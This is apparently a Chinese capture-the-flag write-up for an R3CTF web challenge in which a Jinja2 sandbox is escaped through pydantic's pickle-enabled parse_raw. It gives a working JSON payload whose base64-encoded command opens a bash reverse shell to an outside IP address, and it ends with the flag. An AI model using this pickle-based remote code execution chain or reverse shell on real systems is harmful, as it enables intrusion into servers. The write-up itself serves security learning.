题目描述
分析
下载附件目录结构如下
源码如下:
from jinja2.sandbox import SandboxedEnvironment
from jinja2.exceptions import UndefinedError
from fastapi import FastAPI, Form
from fastapi.responses import HTMLResponse
from pydantic import BaseModel
from typing_extensions import Annotated
from typing import Union
app = FastAPI()
class User(BaseModel):
name: str
description: Union[str, None] = None
age: int
class Template(BaseModel):
source: str
@app.get("/", response_class=HTMLResponse)
def index():
return """xxx前端代码忽略"""
@app.get("/preview", response_class=HTMLResponse)
def preview_page():
return """xxx前端代码忽略"""
@app.post("/preview", response_class=HTMLResponse)
def submit_preview(template: Template, user: User):
env = SandboxedEnvironment()
try:
preview = env.from_string(template.source).render(user=user)
return preview
except UndefinedError as e:
return e
本地起服务调试一下:
传输数据的时候类传入的BaseModel作为默认参数
打断点
这里直接就pickle.load了
payload:
{
"user":{"name":"John","description":"aaa","age":"18"},
"template":{"source":"exp"}
}
exp:
user.parse_raw(b=\"cmd\",allow_pickle=true,content_type='pickle')
cmd:
(S'要执行的命令'\nios\nsystem\n.
最终payload
{"user":{"name":"John","description":"","age":"18"},"template":{"source":"{{user.parse_raw(b=\"(S'echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTQuMTMyLjI1MC4xNDQvODA4MCAwPiYx|base64 -d|bash -i'\nios\nsystem\n.\",allow_pickle=true,content_type=\"Protocol.pickle\")}}"}}
flag
R3CTF{D0CuM3NTa7lOn_l5_Ur_63st_1RieND_434eaea8aa0a}
Comments | NOTHING